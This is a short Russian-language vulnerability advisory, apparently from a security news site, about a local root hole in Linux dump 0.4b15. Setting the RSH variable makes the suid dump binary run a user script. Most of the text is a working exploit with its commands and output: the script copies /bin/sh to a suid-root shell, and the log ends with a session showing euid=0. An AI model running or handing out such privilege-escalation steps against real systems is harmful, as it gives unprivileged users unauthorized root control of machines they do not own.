Команды Linux'а dump и restore выполняют внешнюю программу с suid привилегией. Этот факт позволяет местным пользователям получать r00t привилегии простой модификацией выполненной оболочки (параметр RSH)

Системы уязвимы:
dump-0.4b15

Эксплоит:
$ export TAPE=garbage:garbage
$ export RSH=/home/mat/execute_this
$ cat > /home/mat/execute_this
#!/bin/sh
cp /bin/sh /home/mat/sh
chmod 4755 /home/mat/sh
$ chmod 755 /home/mat/execute_this
$ /sbin/dump -0 /

  DUMP: Connection to garbage established.
  DUMP: Date of this level 0 dump: Tue Oct 31 14:38:00 2000
  DUMP: Date of last level 0 dump: the epoch
  DUMP: Dumping /dev/hda2 (/) to garbage on host garbage
  DUMP: Label: none
/dev/hda2: Permission denied while opening filesystem
$ ls -la /home/mat/sh

 -rwsr-xr-x    1 root     tty        316848 Oct 31 14:38 /home/mat/sh
$ /home/mat/sh

bash# id
 uid=500(mat) gid=500(mat) euid=0(root) groups=500(mat)

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии